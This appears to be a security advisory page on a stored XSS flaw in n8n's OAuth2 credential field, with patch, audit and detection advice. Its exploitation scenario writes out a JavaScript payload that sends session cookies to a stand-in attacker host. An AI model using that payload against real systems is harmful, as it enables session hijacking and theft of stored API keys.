AI Threat Alert
n8n: stored XSS via malicious OAuth2 Authorization URL
Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | >= 2.7.0, < 2.8.0 | 2.8.0 |
Do you use n8n? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH: Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field. 2. AUDIT: Query existing OAuth2 credentials for entries with 'javascript:' or 'data:' scheme URLs; revoke any suspicious credentials. 3. RESTRICT: Tighten credential creation and sharing permissions to the minimum necessary set of users until patched. 4. DETECT: Add WAF rules or log-based alerts for 'javascript:' or 'vbscript:' patterns in n8n API requests to credential endpoints. 5. SCOPE: Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
## Impact An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session. ## Patches The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit credential creation and sharing permissions to fully trusted users only. - Restrict access to the n8n instance to trusted users only. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A disgruntled team member or attacker who has compromised a low-privilege n8n account (e.g., a developer account) creates an OAuth2 credential named something innocuous like 'Slack Integration (Prod)'. In the Authorization URL field they inject: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session, exfiltrating session cookies to the attacker's C2. The attacker replays the session token, gaining full admin access to n8n and all stored credentials—including OpenAI API keys, database connection strings, and downstream service tokens.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N References
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr
- github.com/n8n-io/n8n/security/advisories/GHSA-364x-8g5j-x2pr